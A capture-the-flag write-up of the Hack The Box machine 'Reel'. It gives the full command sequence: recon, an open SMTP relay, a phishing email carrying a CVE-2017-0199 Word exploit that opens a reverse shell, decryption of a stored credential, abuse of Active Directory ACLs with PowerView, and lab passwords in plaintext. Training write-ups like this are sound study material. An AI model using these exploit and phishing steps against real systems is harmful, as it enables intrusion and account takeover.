HTB - Reel

Machine Info
Reel is medium to hard difficulty machine, which requires a client-side attack to bypass the perimeter and highlights a technique for gaining privileges in an Active Directory environment.
Enumeration
Scope
IP Address: 10.10.10.77
Nmap Scan
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p- --min-rate 10000 $ip -Pn
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack
22/tcp open ssh syn-ack
25/tcp open smtp syn-ack
135/tcp open msrpc syn-ack
139/tcp open netbios-ssn syn-ack
445/tcp open microsoft-ds syn-ack
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p -sCV $ip -Pn -oN Nmap/script-scan
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_05-29-18 12:19AM <DIR> documents
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH 7.6 (protocol 2.0)
| ssh-hostkey:
| 2048 82:20:c3:bd:16:cb:a2:9c:88:87:1d:6c:15:59:ed:ed (RSA)
| 256 23:2b:b8:0a:8c:1c:f4:4d:8d:7e:5e:64:58:80:33:45 (ECDSA)
|_ 256 ac:8b:de:25:1d:b7:d8:38:38:9b:9c:16:bf:f6:3f:ed (ED25519)
25/tcp open smtp?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, X11Probe:
| 220 Mail Service ready
| FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| Hello:
| 220 Mail Service ready
| EHLO Invalid domain address.
| Help:
| 220 Mail Service ready
| DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| SIPOptions:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| TerminalServerCookie:
| 220 Mail Service ready
|_ sequence of commands
| smtp-commands: REEL, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2012 R2 Standard 9600 microsoft-ds
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 3:0:2:
|_ Message signing enabled and required
| smb-os-discovery:
| OS: Windows Server 2012 R2 Standard 9600 (Windows Server 2012 R2 Standard 6.3)
| OS CPE: cpe:/o:microsoft:windows_server_2012::-
| Computer name: REEL
| NetBIOS computer name: REEL\x00
| Domain name: HTB.LOCAL
| Forest name: HTB.LOCAL
| FQDN: REEL.HTB.LOCAL
|_ System time: 2024-07-12T12:48:32+01:00
| smb2-time:
| date: 2024-07-12T11:48:30
|_ start_date: 2024-07-12T11:40:43
|_clock-skew: mean: -19m53s, deviation: 34m36s, median: 4s
* Open ports: 21,22,25,135,139,445
* Services: FTP - SSH - SMTP - RPC - SMB
* Versions: Windows Server 2012 R2 Standard 9600 - OpenSSH 7.6
* Important Notes: FQDN: REEL.HTB.LOCAL - Domain name: HTB.LOCAL - Anonymous FTP login allowed
FTP Enumeration
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ wget -m --no-passive ftp://anonymous:anonymous@$ip
<snip>
FINISHED --2024-07-12 07:48:01--
Total wall clock time: 3.0s
Downloaded: 5 files, 17K in 0.2s (75.3 KB/s)
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ ls
10.10.10.77 Nmap
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ tree 10.10.10.77
10.10.10.77
└── documents
├── AppLocker.docx
├── Windows Event Forwarding.docx
└── readme.txt
I downloaded these files but I found nothing interesting inside them. except the email address of the creator of these files nico@megabank.com

RPC Enumeration
No data from rpcclient
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ rpcclient -U "%" $ip
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
SMB Enumeration
I can't list the shares with cme
or smbclient
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ smbclient -N -L //$ip
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.77 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ crackmapexec smb $ip -u '' -p '' --shares
SMB 10.10.10.77 445 REEL [*] Windows Server 2012 R2 Standard 9600 x64 (name:REEL) (domain:HTB.LOCAL) (signing:True) (SMBv1:True)
SMB 10.10.10.77 445 REEL [+] HTB.LOCAL\:
SMB 10.10.10.77 445 REEL [-] Error enumerating shares: STATUS_ACCESS_DENIED
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ crackmapexec smb $ip -u 'guest' -p '' --shares
SMB 10.10.10.77 445 REEL [*] Windows Server 2012 R2 Standard 9600 x64 (name:REEL) (domain:HTB.LOCAL) (signing:True) (SMBv1:True)
SMB 10.10.10.77 445 REEL [-] HTB.LOCAL\guest: STATUS_ACCOUNT_DISABLED
SMTP Enumeration
I always scan for open-relay
if I found SMTP
server to check for the possibility of sending arbitrary emails that can be used for phishing.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ nmap -p25 --script smtp-open-relay $ip -Pn
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-12 08:05 EDT
Nmap scan report for 10.10.10.77
Host is up (0.068s latency).
PORT STATE SERVICE
25/tcp open smtp
|_smtp-open-relay: Server is an open relay (8/16 tests)
Initial Access
Shell as nico
I got a hint from community that there is a CVE affects Microsoft office that allow RCE via phishing emails. CVE-2017–0199
since we can send arbitrary emails as smtp server is Open relay,
we can craft a payload and send it via smtp server to get remote code execution
There is a Metasploit module that can generate the malicious payload we want to send
msf6 > search CVE-2017-0199
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/fileformat/office_word_hta 2017-04-14 excellent No Microsoft Office Word Malicious Hta Execution
msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/fileformat/office_word_hta) > options
Module options (exploit/windows/fileformat/office_word_hta):
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME msf.doc yes The file name.
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local mac
hine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH default.hta yes The URI to use for the HTA file
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.2 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Microsoft Office Word
msf6 exploit(windows/fileformat/office_word_hta) > set srvhost tun0
msf6 exploit(windows/fileformat/office_word_hta) > set srvport 80
msf6 exploit(windows/fileformat/office_word_hta) > set lhost tun0
msf6 exploit(windows/fileformat/office_word_hta) > run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.16.7:4444
msf6 exploit(windows/fileformat/office_word_hta) > [+] msf.doc stored at /home/kali/.msf4/local/msf.doc
[*] Using URL: http://10.10.16.7/default.hta
[*] Server started.
Send email to the user we found with sendEmail
command with the attachment generated from Metasploit
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ sendemail -t nico@megabank.com -f blind@htb.com -u 'Are you Reel!!!' -m "Click me" -a /home/kali/.msf4/local/msf.doc -s $ip
Jul 12 11:27:25 kali sendemail[77146]: Email was sent successfully!
At Metasploit, I got a connection back as nico
user
[*] Sending stage (176198 bytes) to 10.10.10.77
[*] Meterpreter session 1 opened (10.10.16.7:4444 -> 10.10.10.77:58083) at 2024-07-12 11:27:45 -0400
msf6 exploit(windows/fileformat/office_word_hta) > sessions 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: HTB\nico
Get the flag from user's desktop
meterpreter > shell
Process 3524 created.
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Windows\system32>cd C:\Users\nico
C:\Users\nico>type Desktop\user.txt
4b1fa88985d787becfxxxxxxxxxxxxxx
User Flag: 4b1fa88985d787becfxxxxxxxxxxxxxx
Privilege Escalation
Shell as Tom
C:\Users\nico>tree /F
Folder PATH listing
Volume serial number is FFFFFFB9 CEBA:B613
C:.
Contacts
Desktop
cred.xml
user.txt
<snip>
It's a PowerShell credential file

We can decrypt these credentials with Cli-xml
native tool
C:\Users\nico>PowerShell -c "$credentials= Import-Clixml -Path C:\Users\nico\Desktop\cred.xml; $credentials.GetNetworkCredential().username; $credentials.GetNetworkCredential().password"
Tom
1ts-mag1c!!!
We don't have any remote access solution to the machine except ssh
, Let's try to authenticate with tom with ssh
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ ssh tom@$ip
tom@10.10.10.77's password:
tom@REEL C:\Users\tom>
There are multiple interesting files in the tom's home directory, I will explore them
tom@REEL C:\Users\tom>tree /F
C:.
├───Contacts
├───Desktop
│ └───AD Audit
│ │ note.txt
│ │
│ └───BloodHound
│ │ PowerView.ps1
│ │
│ └───Ingestors
│ acls.csv
│ BloodHound.bin
│ BloodHound_Old.ps1
│ SharpHound.exe
│ SharpHound.ps1
Note.txt
tom@REEL C:\Users\tom>type "Desktop\AD Audit\note.txt"
Findings:
Surprisingly no AD attack paths from user to Domain Admin (using default shortest path query).
Maybe we should re-run Cypher query against other groups we've created.
The other files are PowerView.ps1
which can be used to enumerate AD Environment and exploit misconfiguration, Sharphound.exe
is the Ingestor of bloodhound
that collect information about the domain.
The most interesting file is acls.csv
, I will copy it to my kali machine after starting local smb server
tom@REEL C:\Users\tom>net use n: \\10.10.16.7\share /user:blind0bandit blind0bandit
The command completed successfully.
tom@REEL C:\Users\tom>copy "Desktop\AD Audit\BloodHound\Ingestors\acls.csv" n:
1 file(s) copied.
I opened the file and start to explore it manually as I tried to upload it to bloodhound, but it failed for me.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ open acls.csv
Searching for the user tom, I found the following:
user tom has
WriteOwner
on userclaire
user
claire
hasWriteDacl
on groupbackup_admins


It's a potential path we can take to takeover
claire
account then authenticate with this account and modify the ACLs ofbackup_admins
group to be able to add ourselves in that group which seems to be high privileges groupUsing
PowerView.ps1
already exists on the machine can be useful to execute this attack path
Shell as Claire
Abuse WriteOwner
to get ownership of claire
user to be able to modify its access control and get the privileges to change its password
set-domainobjectowner -Identity claire -OwnerIdentity tom
add-domainobjectacl -TargetIdentity claire -PrincipalIdentity tom -Rights Resetpassword
Change password of claire
user
$pass = ConvertTo-SecureString 'P@ssword123!' -AsPlainText -Force
set-domainuserpassword -identity claire -accountpassword $pass
abuse WriteDacl
to add GenericAll
right to user cliare
on group backup_admins
so I have full control on that group
Add-DomainObjectAcl -Rights 'All' -TargetIdentity "Backup_admins" -PrincipalIdentity "htb.local\claire"
ssh with claire
and add me to the target group
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ ssh claire@$ip
claire@10.10.10.77's password:
claire@REEL C:\Users\claire>
net group "backup_admins" claire /add
you must logout and login in again for the changes to take effect and be fast, too :)
backup_admins
group has Full access on Administrator
Folder from the output of icacls
below
claire@REEL C:\Users>icacls Administrator
Administrator NT AUTHORITY\SYSTEM:(OI)(CI)(F)
HTB\Backup_Admins:(OI)(CI)(F)
HTB\Administrator:(OI)(CI)(F)
BUILTIN\Administrators:(OI)(CI)(F)
Successfully processed 1 files; Failed processing 0 files
I tried to get the flag but it seems I don't have access to
claire@REEL C:\Users\Administrator>type Desktop\root.txt
Access is denied.
Shell as administrator
Exploring administrator
home directory shows several .ps1
scripts
claire@REEL C:\Users\Administrator>tree /F
├───Desktop
│ │ root.txt
│ │
│ └───Backup Scripts
│ backup.ps1
│ backup1.ps1
│ BackupScript.ps1
│ BackupScript.zip
│ folders-system-state.txt
│ test2.ps1.txt
I found the admin password on one of these files
claire@REEL C:\Users\Administrator>type "Desktop\Backup Scripts\BackupScript.ps1"
# admin password
$password="Cr4ckMexxxxxxxxx"
<snip>
And we have a shell as admin
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ ssh administrator@$ip
administrator@10.10.10.77's password:
administrator@REEL C:\Users\Administrator>type Desktop\root.txt
e622958df7390059522xxxxxxxxxxxxxx
Root Flag: e622958df7390059522xxxxxxxxxxxxxx
Last updated